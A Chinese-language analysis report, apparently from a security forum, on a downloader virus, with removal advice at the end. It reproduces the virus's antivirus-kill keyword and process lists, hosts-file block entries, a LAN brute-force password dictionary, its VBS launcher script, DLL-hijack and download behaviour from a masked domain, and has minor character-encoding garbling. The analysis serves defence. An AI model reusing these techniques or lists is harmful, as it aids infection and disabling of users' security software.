這是一個(gè)具有多種傳播功能和反殺毒軟件功能的下載者病毒����,傳播方式新穎獨(dú)特��,需要嚴(yán)密防范�!
下面是該病毒的詳細(xì)分析報(bào)告:
病毒初始化過程:
1.創(chuàng)建一個(gè)互斥量:中華吸血鬼2.2
2.刪除SOFTWARE\Microsoft\Active Setup\Installed
Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}
3.釋放如下副本或文件:
%systemroot%\Tasks\綠化.bat
%systemroot%\Tasks\csrss.exe
%systemroot%\Tasks\wsock32.dll
4.之后創(chuàng)建很多線程���,執(zhí)行多種病毒功能:
(1)通過GetWindowTextA函數(shù)獲得窗口標(biāo)題,并比較是否含有如下字樣
worm
卡巴斯基
江民
金山
Anti
anti
Virus
virus
Firewall
Mcafee
查殺
主動防御
微點(diǎn)
系統(tǒng)保護(hù)
主 動
主動
殺馬
木馬
上報(bào)
舉 報(bào)
舉報(bào)
進(jìn) 程
進(jìn)程
系統(tǒng)安全
Process
NOD32
專 殺
專 殺
專殺
安全衛(wèi)士
綠鷹
...
如果含有則使用PostMessage函數(shù)會發(fā)送消息給他們:
首先發(fā)送一個(gè)WM_Destroy���,之后發(fā)送兩個(gè)WM_Close 最后發(fā)一個(gè)WM_Destroy 的消息�。并把窗口標(biāo)題名保存下來���。
之后會調(diào)用Messageboxa函數(shù)彈出一個(gè)標(biāo)題為"Windows盜版驗(yàn)證為"的窗口
并顯示如下字樣“安全提示:您正在使用的(剛剛獲得的窗口標(biāo)題名稱)是盜版軟件�����,可能您是盜版軟件的受害者�����,為了給合法用戶提供保證���,我們無法繼續(xù)給您提供服務(wù)�,請到指定銷售商購買我們的正版軟件,如果有任何疑問,請到我們微軟主頁查看http://www.microsoft.com”
(2) 破壞冰刃
查找類名為Afxcontrolbar423s的窗口
然后發(fā)送WM_Close關(guān)閉 再模擬鍵盤輸入按一下回車鍵
(3) U盤傳播功能
檢測可移動存儲中是否有autorun.inf文件�����,如果有將其改名
之后向里面寫入autorun.inf
創(chuàng)建recycle.{645FF040-5081-101B-9F08-00AA002F954E}文件夾���,在該文件夾內(nèi)寫入GHOSTBAK.exe(病毒文件)
(4) 病毒感染統(tǒng)計(jì)
搜集被感染主機(jī)的mac地址,并把被感染主機(jī)的mac地址和感染的病毒版本發(fā)送給http://www.*******.cn/tj/ct.asp頁面
(5) 修改hosts文件
獲得%programfiles%的環(huán)境變量����,接著查找[url=file://drivers/etc//hosts]\\drivers\etc\\hosts[/url]文件
寫入如下數(shù)據(jù):
127.0.0.0 360.qihoo.com
127.0.0.1 qihoo.com
127.0.0.1www.qihoo.com
127.0.0.1www.qihoo.cn
127.0.0.1 124.40.51.17
127.0.0.1 58.17.236.92
127.0.0.1www.kaspersky.com
127.0.0.1 60.210.176.251
127.0.0.1www.cnnod32.cn
127.0.0.1www.lanniao.org
127.0.0.1www.nod32club.com
127.0.0.1www.dswlab.com
127.0.0.1 bbs.sucop.com
127.0.0.1www.virustotal.com
127.0.0.1 tool.ikaka.com
127.0.0.1www.jiangmin.com
127.0.0.1www.duba.net
127.0.0.1www.eset.com.cn
127.0.0.1www.nod32.com
127.0.0.1 shadu.duba.net
127.0.0.1 union.kingsoft.com
127.0.0.1www.kaspersky.com.cn
127.0.0.1 kaspersky.com.cn
127.0.0.1 virustotal.com
127.0.0.1www.#
127.0.0.1www.360safe.cn
127.0.0.1www.360safe.com
127.0.0.1www.chinakv.com
127.0.0.1www.rising.com.cn
127.0.0.1 rising.com.cn
127.0.0.1 dl.jiangmin.com
127.0.0.1 jiangmin.com
每1秒循環(huán)一次
(6) 遍歷進(jìn)程��,調(diào)用Terminate Process函數(shù)結(jié)束如下進(jìn)程:
AST.exe
360tray.exe
ast.exe
FWMon.exe
(7) 遍歷磁盤文件刪除擴(kuò)展名為gho,GHO,Gho的文件
(8) arp欺騙功能
獲取本機(jī)IP地址 然后把所在同網(wǎng)段內(nèi)的.2~.255的機(jī)器作為欺騙對象
由系統(tǒng)目錄下的arps.com執(zhí)行%s -idx 0 -ip %s -port 80 -insert \"%s的命令 對局域網(wǎng)內(nèi)機(jī)器進(jìn)行arp欺騙
(9) 局域網(wǎng)弱密碼猜解傳播
以administrator為用戶名�����,對局域網(wǎng)中其他機(jī)器進(jìn)行密碼猜解�。如果成功則復(fù)制到對方機(jī)器的共享的C,D,E,F盤中,以hackshen.exe
病毒猜解的密碼字典如下:
woaini
baby
asdf
NULL
angel
asdfgh
1314520
5201314
caonima
88888
bbbbbb
12345678
memory
abc123
qwerty
123456
password
enter
hack
xpuser
money
yeah
time
game
user
home
alex
guest
admin
test
administrator
movie
root
love
(10)
刪除HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings鍵
釋放一個(gè)hackchen.vbs到%systemroot%\Tasks
hackchen.vbs內(nèi)容:
On Error Resume Next
Set rs=createObject("Wscript.shell")
rs.run "%windir%\Tasks\csrss.exe",0
并且注冊HKLM\SOFTWARE\Microsoft\Active Setup\Installed
Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}
指向%systemroot%\Tasks\hackchen.vbs
(11) 病毒自動更新功能�����。
在系統(tǒng)目錄下釋放meupdate.ini文件�,并且和http://www.*******.cn/22.txt做比較��,如果不同則下載http://www.*******.cn/server.exe(最新版病毒程序)到c:\_default.pif�,并且每600ms執(zhí)行一次
(12)
通過查找%ProgramFiles%的環(huán)境變量獲得程序文件夾路徑��,之后查找[url=file://winrar//Rar.exe]\\WinRAR\\Rar.exe[/url]獲得winrar安裝路徑����。
遍歷所有分區(qū)的.rar,.zip,.tgz,.cab,.tar文件 找到后
后臺調(diào)用winrar執(zhí)行"(winrar路徑)" -ep a "(找到的rar等文件路徑)" %systemroot%\Tasks\綠化.bat 命令
將綠化.bat壓縮進(jìn)壓縮包,綠化.bat即為病毒本身�,誘使用戶點(diǎn)擊中毒。
(13)(此方法十分新穎)
遍歷所有文件夾并且將%systemroot%\Tasks\wsock32.dll 復(fù)制到每個(gè)文件夾下
當(dāng)該文件夾下的exe文件的導(dǎo)入表含有wsock32.dll的時(shí)候,會首先調(diào)用同文件夾下的wsock32.dll�,也就是病毒釋放的文件���。此時(shí)會從下載http://www.*******.cn/server.exe(病毒最新版本)并執(zhí)行?��。��。?/p>
(14)
查找某些類名為#32770的窗口���,并且試圖發(fā)送"我做了快一個(gè)月了,每天2個(gè)小時(shí)有40-50元的收入,你也來看看吧,長期大量招聘網(wǎng)絡(luò)兼職http://www.*******.cn/jianzhi.htm"的消息給對方(應(yīng)該是通過QQ之類的聊天工具傳播)
(15) 遍歷非系統(tǒng)分區(qū)的html,aspx����,htm等文件 寫入iframe代碼
(16)下載木馬功能
下載 http://www.*******.cn/ft/qq.exe http://www.*******.cn/cj/qq.exe 并執(zhí)行
清除方法不作贅述,安全模式下清理所有文件夾下的wsock32.dll���, 并利用工具清理
%systemroot%\Tasks\綠化.bat
%systemroot%\Tasks\csrss.exe
并打開所有壓縮包文件 刪除里面的綠化.bat����。 最后使用殺毒軟件全盤殺毒
這也是一個(gè)浩大的工程吧~~
綜觀此病毒有很多新穎之處,首先是在關(guān)閉殺軟之后彈出窗口�����,容易給不知情者以迷惑��;其次病毒釋放的wsock32.dll會使得任意該目錄下的exe文件成為下載病毒文件的傀儡���;再次由于windows的某些保護(hù),tasks目錄下的文件無法直接看到��,這又給病毒了一個(gè)絕佳的藏身之地;最后�,病毒還會將自己壓縮到壓縮包中�����,起一個(gè)誘惑的名字誘使用戶再次中毒�。
最近惡性病毒以及木馬群肆虐��,但此類行為特征新穎的病毒也有所猖獗���,望大家做好防范�!
